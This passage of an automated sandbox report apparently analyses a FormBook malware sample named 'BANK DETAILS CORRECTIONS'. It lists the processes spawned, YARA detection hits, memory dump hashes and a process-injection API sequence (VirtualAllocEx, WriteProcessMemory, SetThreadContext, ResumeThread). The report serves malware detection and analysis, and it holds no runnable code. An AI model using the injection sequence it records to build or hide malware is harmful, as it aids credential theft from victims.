                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:24
                                                                                  Start time:14:45:52
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                  Imagebase:0x310000
                                                                                  File size:31'744 bytes
                                                                                  MD5 hash:76676F0A21E6AF109845151B3CEFE211
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Has exited:true

                                                                                  Target ID:25
                                                                                  Start time:14:45:57
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe"
                                                                                  Imagebase:0x1c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Has exited:false

                                                                                  Target ID:27
                                                                                  Start time:14:46:10
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                  Imagebase:0x7ff613480000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true


                                                                                    Execution Graph

                                                                                    Execution Coverage:9.6%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:275
                                                                                    Total number of Limit Nodes:14

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $2q
                                                                                    • API String ID: 0-3731487377
                                                                                    • Opcode ID: 8d8d8b2c6c551a4ef43cd587318ed02df102782182797f1c8bb48ba4375e6918
                                                                                    • Instruction ID: c8b1173ba7950ea7beadb1370f6aca1c02d81cebc1def98b3fd1f9a9d221c888
                                                                                    • Opcode Fuzzy Hash: 8d8d8b2c6c551a4ef43cd587318ed02df102782182797f1c8bb48ba4375e6918
                                                                                    • Instruction Fuzzy Hash: 2C33C534A41219CFDB64EF28C898BD9B7B5BF89300F5086E9D5096B361DB71AE85CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $2q
                                                                                    • API String ID: 0-3731487377
                                                                                    • Opcode ID: 6907ce5ddc0ab3bfe5aa0050cdc14a875ff8b41421d7e5f58195d9dbe86c2b82
                                                                                    • Instruction ID: 1d25e7eb0f0f6764982a8257fa880e24346dbabe1a42f32b3a78ef9dfa83cc30
                                                                                    • Opcode Fuzzy Hash: 6907ce5ddc0ab3bfe5aa0050cdc14a875ff8b41421d7e5f58195d9dbe86c2b82
                                                                                    • Instruction Fuzzy Hash: F023C534A41219CFDBA4EF24C898BD9B7B5BF89300F5086E9D5096B361DB71AE85CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 309d4fd111d640afbef2d8b7d2504be4028d2b0ea8eeb9a06eb4d66600d4b45b
                                                                                    • Instruction ID: e06d6620e89d9cbf23618da4fe58031588c45201274ff0d694f66a5964ad4e66
                                                                                    • Opcode Fuzzy Hash: 309d4fd111d640afbef2d8b7d2504be4028d2b0ea8eeb9a06eb4d66600d4b45b
                                                                                    • Instruction Fuzzy Hash: A8524034A007498FDB14DF28C844BD9B7B2BF89314F2582A9D5586F3A1DBB1AD86CF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 134890cdb6794b94e18b02c8a74238da655566d820c7ccd6543b3a465b1b378e
                                                                                    • Instruction ID: 43d41d421fe15e9309784cfa93f3b3fd3d58d769eccba2e7c0264487707055de
                                                                                    • Opcode Fuzzy Hash: 134890cdb6794b94e18b02c8a74238da655566d820c7ccd6543b3a465b1b378e
                                                                                    • Instruction Fuzzy Hash: B9524034A00749CFDB14DF28C844BD9B7B2BF85314F2582A9D5586F3A1DBB1A986CF81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c7c5a417c189d46f803a38ab3ea8a109fdb7879979d16cdf7627ae8bd50cc77c
                                                                                    • Instruction ID: 0d170b97a867f68d01f50fb6f619d45f894afe11744e6c0652f08128866cf29c
                                                                                    • Opcode Fuzzy Hash: c7c5a417c189d46f803a38ab3ea8a109fdb7879979d16cdf7627ae8bd50cc77c
                                                                                    • Instruction Fuzzy Hash: F5419FB1D286199FEB15CF96DC506EEBBFABF8A300F04C066D50AA7251E7342945CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 519fda8b01cad0b3fbac2b105fb67e9b8aa337243d60518333fb1167728e4b07
                                                                                    • Instruction ID: 720fc934f1169b44c3426ea496cbb29297647fa69e36007169837abc38b3eef0
                                                                                    • Opcode Fuzzy Hash: 519fda8b01cad0b3fbac2b105fb67e9b8aa337243d60518333fb1167728e4b07
                                                                                    • Instruction Fuzzy Hash: D0C09BD5DFE004D1C5001D8560100FCE73CD38F162E023055821F67205C5505D66864D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076D807E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: f5483215d20586bb27c708bf7779373699515390441de5b6c2ee2b71ecd069b6
                                                                                    • Instruction ID: cc75e980e714dcc2aae451bf0806a580111c324b1a5bb2732ec295ebcfb09bdf
                                                                                    • Opcode Fuzzy Hash: f5483215d20586bb27c708bf7779373699515390441de5b6c2ee2b71ecd069b6
                                                                                    • Instruction Fuzzy Hash: 2DA14DB1D1021ADFEB24CF69C841BEDBBB2BF48314F1485A9E819A7240D7749D85CF92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076D807E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 74eaaae0f3eaa9bb458293726f49ed4bcae68c11e417255a0fe868c13f5ef62c
                                                                                    • Instruction ID: 6fa7136ddee9945181070a41c25b50adf9a1ca320283fdc621256843b8108ff6
                                                                                    • Opcode Fuzzy Hash: 74eaaae0f3eaa9bb458293726f49ed4bcae68c11e417255a0fe868c13f5ef62c
                                                                                    • Instruction Fuzzy Hash: AD915EB1D1021ADFEF24CF69C841BEDBBB2BF48314F1485A9E819A7240D7749985CF92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0135B0C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 3caa14bea3e99040ac6c873fc0c7f3d0c1d239ac651c45edd498e713770ea6e7
                                                                                    • Instruction ID: 7ee0111d8ef0dc3e64a36a4b643cd62f7cae99ec30dacfc09ca919ea95d54704
                                                                                    • Opcode Fuzzy Hash: 3caa14bea3e99040ac6c873fc0c7f3d0c1d239ac651c45edd498e713770ea6e7
                                                                                    • Instruction Fuzzy Hash: 7A714870A00B058FEB64DF2AD444B5ABBF1BF88604F008A2DE84AD7B50D775E849CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 053B4381
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: e2706f4cd30e1c6962de442d81a1779cc922a9c010641b48b5e14927f1f01af0
                                                                                    • Instruction ID: dd00a02438a65b6dce1695cbf63d93a95c7e825ae729dc1ee2d6c92ccca4d556
                                                                                    • Opcode Fuzzy Hash: e2706f4cd30e1c6962de442d81a1779cc922a9c010641b48b5e14927f1f01af0
                                                                                    • Instruction Fuzzy Hash: F94139B4900305CFDB14CF95C489BAABBF6FB88314F28C559E519AB721D3B0A841CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 002511664e926b3445a7fef075784b600e9db2caecc73e8ce8451f9d4c123bf9
                                                                                    • Instruction ID: 9c7ad576087d96a125083390b31ccdbd6b6515427c9ad023c49154eb954dbb4d
                                                                                    • Opcode Fuzzy Hash: 002511664e926b3445a7fef075784b600e9db2caecc73e8ce8451f9d4c123bf9
                                                                                    • Instruction Fuzzy Hash: 6E41EFB0C00718CFEB24CFAAC885BDDBBB5BF49704F20806AD408AB255DB756946CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 743bf96f54ad5f6d094e8649ab0abdedd17d8bfdc1365b6f787845cafe2d9957
                                                                                    • Instruction ID: 0d39a88249d95a9abed235f8d992a65cb35eb797afbd441036895a6633e85f4b
                                                                                    • Opcode Fuzzy Hash: 743bf96f54ad5f6d094e8649ab0abdedd17d8bfdc1365b6f787845cafe2d9957
                                                                                    • Instruction Fuzzy Hash: CB41F3B1C00719CFEB24CFA9C885BDEBBB5BF49704F20805AD408AB255DB756946CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0135B141,00000800,00000000,00000000), ref: 0135B352
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076D7C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076D7C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076D7D30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0135D306,?,?,?,?,?), ref: 0135D3C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076D766E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076D766E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076D7D30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0135D306,?,?,?,?,?), ref: 0135D3C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076D7B6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0135B141,00000800,00000000,00000000), ref: 0135B352
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0135B141,00000800,00000000,00000000), ref: 0135B352
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076D7B6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 076DC72D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 076DC72D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0135B0C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294548599.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12fd000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294548599.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12fd000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294548599.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12fd000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
